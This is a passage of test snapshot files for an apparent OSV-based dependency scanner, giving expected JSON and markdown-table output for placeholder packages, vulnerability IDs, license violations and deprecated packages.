"experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" }, { "ids": [ "GHSA-123" ], "aliases": null, "experimental_analysis": { "GHSA-123": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scarier!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "9" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": true, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "experimental_analysis": { "OSV-1": { "called": false, "unimportant": false } }, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "max_severity": "8.3" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1", "GHSA-123" ], "aliases": [ "OSV-1", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" }, { "aliases": [ "OSV-1" ], "id": "GHSA-123", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "", "ecosystem": "npm", "commit": "abc123" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "details": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "id": "OSV-1" } ] }, { "package": { "name": "mine3", "version": "0.10.2-rc", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-2" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-2" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine2", "version": "5.9.0", "ecosystem": "npm" } } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [TestPrintJSONResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] { "results": [ { "source": { "path": "/path/to/my/first/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] }, { "source": { "path": "/path/to/my/second/lockfile", "type": "sbom" }, "packages": [ { "package": { "name": "mine1", "version": "1.2.3", "ecosystem": "npm" }, "dependency_groups": [ "dev" ], "groups": [ { "ids": [ "OSV-1" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "id": "OSV-1", "severity": [ { "score": "1" } ], "summary": "Something scary!" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: internal/output/__snapshots__/markdowntable_test.snap ================================================ [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages,_some_license_violations#01 - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | Packagist | author1/mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | Apache-2.0 | npm | mine2 | 3.2.5 | path/to/my/second/lockfile | | MIT | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package,_no_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package,_no_licenses - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_an_unknown_license - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_multiple_license_violations - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT, Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_and_one_license_violation_(dev) - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/one_source_with_one_package_with_just_a_commit_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithLicenseViolations/two_sources_with_packages,_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_called_vulnerabilities_and_license_violations - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/multiple_sources_with_a_mixed_count_of_packages_with_versions_and_commits,_some_vulnerabilities_and_license_violations - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | | MIT | npm | mine1 | 1.3.5 | path/to/my/third/lockfile | | Apache-2.0 | npm | mine1 | 1.2.3 | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_in_working_directory_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_deprecated_package - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. Total 1 package deprecated. # Deprecated packages | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | | npm | deprecated-pkg | 1.0.0 | path/to/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_called_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_license_violation - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/one_source_with_one_package,_one_vulnerability,_and_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine1 | 1.2.3 | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithMixedIssues/two_sources_with_packages,_one_vulnerability,_one_license_violation - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | License Violation | Ecosystem | Package | Version | Source | | --- | --- | --- | --- | --- | | MIT | npm | mine2 | 5.9.0 | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 (dev) | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-3 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | npm | mine3 | 0.4.1 | -- | path/to/my/second/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] Total 3 packages affected by 3 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 3 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/third/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 1 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | 4.3 | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] Total 4 packages affected by 5 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 5 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.2 | -- | path/to/my/first/lockfile | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] Total 4 packages affected by 6 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 6 Unknown) from 3 ecosystems. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-2 | | NuGet | mine2 | 3.2.5 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-5 | | Packagist | author1/mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-3 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-5 | | Packagist | author3/mine3 | 0.4.1 | -- | path/to/my/second/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/multiple_sources_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/no_sources - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_no_packages - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_no_vulnerabilities - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_one_uncalled_vulnerability,_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | Uncalled vulnerabilities | | | | | | | | 